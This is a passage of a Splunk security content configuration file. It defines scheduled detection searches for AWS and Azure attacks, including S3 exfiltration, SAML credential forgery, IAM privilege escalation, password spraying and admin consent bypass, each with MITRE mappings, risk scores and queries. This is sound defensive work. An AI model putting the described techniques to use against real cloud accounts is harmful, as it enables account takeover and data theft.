action.notable.param.rule_description = This correlation search looks at the risk events created by the detection analytics related to Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more unique AWS analytics and 2 or more distinct MITRE IDs have triggered for a particular risk object. When triggered, this alert may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.notable.param.rule_title = RBA: AWS S3 Exfiltration Behavior Identified
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count values(All_Risk.risk_message) as risk_message from datamodel=Risk.All_Risk where All_Risk.annotations.mitre_attack.mitre_tactic = "collection" OR All_Risk.annotations.mitre_attack.mitre_tactic = "exfiltration" source = *AWS* by All_Risk.risk_object | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 2 and mitre_tactic_id_count>=2 | `aws_s3_exfiltration_behavior_identified_filter`

[ESCU - AWS SAML Access by Provider User and Principal - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search surfaces SAML access at AWS by specific service provider, user and targeted principal. It provides the information needed to detect abnormal access or potential credential hijack or forgery, especially in federated environments using the SAML protocol inside the perimeter or at the cloud provider.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search surfaces SAML access at AWS by specific service provider, user and targeted principal. It provides the information needed to detect abnormal access or potential credential hijack or forgery, especially in federated environments using the SAML protocol inside the perimeter or at the cloud provider.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = Attacks using Golden SAML or SAML assertion hijacks or forgeries are very difficult to detect, as accessing cloud providers with these assertions looks exactly like normal access. However, fields such as source IP (sourceIPAddress), user and the principal targeted at the receiving cloud provider, along with endpoint credential access and abuse detection searches, can provide the necessary context to detect these attacks.
action.escu.creation_date = 2021-01-26
action.escu.modification_date = 2021-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS SAML Access by Provider User and Principal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = From IP address $sourceIPAddress$, user agent $userAgent$ has triggered an event $eventName$ for account ID $recipientAccountId$
action.risk.param._risk = [{"threat_object_field": "sourceIPAddress", "threat_object_type": "ip_address"}, {"risk_object_field": "recipientAccountId", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS SAML Access by Provider User and Principal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=Assumerolewithsaml | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.principalArn requestParameters.roleArn requestParameters.roleSessionName recipientAccountId responseElements.issuer sourceIPAddress userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_saml_access_by_provider_user_and_principal_filter`
[ESCU - AWS SAML Update identity provider - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search provides detection of updates to a SAML provider in AWS. Updates to a SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set up by an attacker.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search provides detection of updates to a SAML provider in AWS. Updates to a SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set up by an attacker.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = Updating a SAML provider or creating a new one may not necessarily be malicious; however, it needs to be closely monitored.
action.escu.creation_date = 2021-01-26
action.escu.modification_date = 2021-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS SAML Update identity provider - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = User $userIdentity.principalId$ from IP address $sourceIPAddress$ has triggered an event $eventName$ to update the SAML provider to $requestParameters.sAMLProviderArn$
action.risk.param._risk = [{"threat_object_field": "sourceIPAddress", "threat_object_type": "ip_address"}, {"risk_object_field": "userIdentity.principalId", "risk_object_type": "user", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS SAML Update identity provider - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search provides detection of updates to a SAML provider in AWS. Updates to a SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set up by an attacker.
action.notable.param.rule_title = AWS SAML Update identity provider
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=UpdateSAMLProvider | stats count min(_time) as firstTime max(_time) as lastTime by eventType eventName requestParameters.sAMLProviderArn userIdentity.sessionContext.sessionIssuer.arn sourceIPAddress userIdentity.accessKeyId userIdentity.principalId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_saml_update_identity_provider_filter`

[ESCU - AWS SetDefaultPolicyVersion - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user has set a default policy version. Attackers have been known to use this technique for privilege escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user has set a default policy version. Attackers have been known to use this technique for privilege escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately set a default policy to allow a user to access all resources. That said, AWS strongly advises against granting full control to all AWS resources.
action.escu.creation_date = 2021-03-02
action.escu.modification_date = 2021-03-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS SetDefaultPolicyVersion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = From IP address $src$, user $user_arn$ has triggered an event $eventName$ for updating the default policy version
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS SetDefaultPolicyVersion - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has set a default policy version. Attackers have been known to use this technique for privilege escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy.
action.notable.param.rule_title = AWS SetDefaultPolicyVersion
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=SetDefaultPolicyVersion eventSource = iam.amazonaws.com | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policy_arn by src requestParameters.versionId eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_setdefaultpolicyversion_filter`

[ESCU - AWS Successful Console Authentication From Multiple IPs - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an AWS account successfully authenticating from more than one unique IP address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and is using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1535"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an AWS account successfully authenticating from more than one unique IP address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and is using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works when AWS CloudTrail events are normalized using the Authentication data model.
action.escu.known_false_positives = A user with successful authentication events from different IPs may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Successful Console Authentication From Multiple IPs - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS Login Activities", "Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has successfully logged into the AWS Console from different IP addresses $src_ip$ within 5 mins
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Successful Console Authentication From Multiple IPs - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = ConsoleLogin | bin span=5m _time | stats values(userAgent) as userAgent values(eventName) as eventName values(src_ip) as src_ip dc(src_ip) as distinct_ip_count by _time user_arn | where distinct_ip_count>1 | `aws_successful_console_authentication_from_multiple_ips_filter`

[ESCU - AWS Successful Single-Factor Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that some accounts do not have MFA enabled for the AWS account; however, it is against the best practices of securing AWS.
action.escu.creation_date = 2022-10-04
action.escu.modification_date = 2022-10-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Successful Single-Factor Authentication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user_name$ has successfully logged into an AWS Console without Multi-Factor Authentication from $src$
action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Successful Single-Factor Authentication - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.notable.param.rule_title = AWS Successful Single-Factor Authentication
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName= ConsoleLogin errorCode=success "additionalEventData.MFAUsed"=No | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id errorCode additionalEventData.MFAUsed userAgent eventID awsRegion user_name userIdentity.arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_successful_single_factor_authentication_filter`

[ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies one source IP failing to authenticate into the AWS Console with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real-time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `AWS Multiple Users Failing To Authenticate From Ip`.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies one source IP failing to authenticate into the AWS Console with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real-time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `AWS Multiple Users Failing To Authenticate From Ip`.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS in order to ingest CloudTrail. We recommend that users try different combinations of the bucket span time and the calculation of the upperBound field to tune this search according to their environment.
action.escu.known_false_positives = No known false positives for this detection. Please review this alert.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Unusual number of failed console login attempts against users $tried_accounts$ seen from $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(_raw) AS distinct_attempts values(user_name) as tried_accounts by _time, src_ip | eventstats avg(distinct_attempts) as avg_attempts , stdev(distinct_attempts) as ip_std by _time | eval upperBound=(avg_attempts+ip_std*3) | eval isOutlier=if(distinct_attempts > 10 and distinct_attempts >= upperBound, 1, 0) | where isOutlier = 1 |`aws_unusual_number_of_failed_authentications_from_ip_filter`

[ESCU - AWS UpdateLoginProfile - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user A, who already has permission to update login profiles, makes an API call to update the login profile of another user B. Attackers have been known to use this technique for privilege escalation in case the new victim (user B) has more permissions than the old victim (user A).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user A, who already has permission to update login profiles, makes an API call to update the login profile of another user B. Attackers have been known to use this technique for privilege escalation in case the new victim (user B) has more permissions than the old victim (user A).
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user.
action.escu.creation_date = 2022-03-03
action.escu.modification_date = 2022-03-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS UpdateLoginProfile - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = From IP address $src$, user agent $userAgent$ has triggered an event $eventName$ for updating the existing login profile, potentially giving user $user_arn$ more access privileges
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS UpdateLoginProfile - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user A, who already has permission to update login profiles, makes an API call to update the login profile of another user B. Attackers have been known to use this technique for privilege escalation in case the new victim (user B) has more permissions than the old victim (user A).
action.notable.param.rule_title = AWS UpdateLoginProfile
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = UpdateLoginProfile userAgent !=console.amazonaws.com errorCode = success | eval match=if(match(userIdentity.userName,requestParameters.userName), 1,0) | search match=0 | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.userName user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_updateloginprofile_filter`

[ESCU - Azure Active Directory High Risk Sign-in - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them into three categories: high, medium and low.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them into three categories: high, medium and low.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. Specifically, this analytic leverages the RiskyUsers and UserRiskEvents log category in the azure:monitor:aad sourcetype.
action.escu.known_false_positives = Details for the risk calculation algorithm used by Identity Protection are unknown and may be prone to false positives.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure Active Directory High Risk Sign-in - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = A high risk event was identified by Identity Protection for user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure Active Directory High Risk Sign-in - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them into three levels: high, medium and low.
action.notable.param.rule_title = Azure Active Directory High Risk Sign-in
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, activity, riskLevel, riskEventType, additionalInfo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_active_directory_high_risk_sign_in_filter`

[ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Service Principals are sometimes configured to legitimately bypass the consent process for purposes of automation. Filter as needed.
action.escu.creation_date = 2024-02-09
action.escu.modification_date = 2024-02-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Service principal $src_user$ bypassed the admin consent process and granted permissions to $dest_user$
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. \
Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight.
action.notable.param.rule_title = Azure AD Admin Consent Bypassed by Service Principal
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
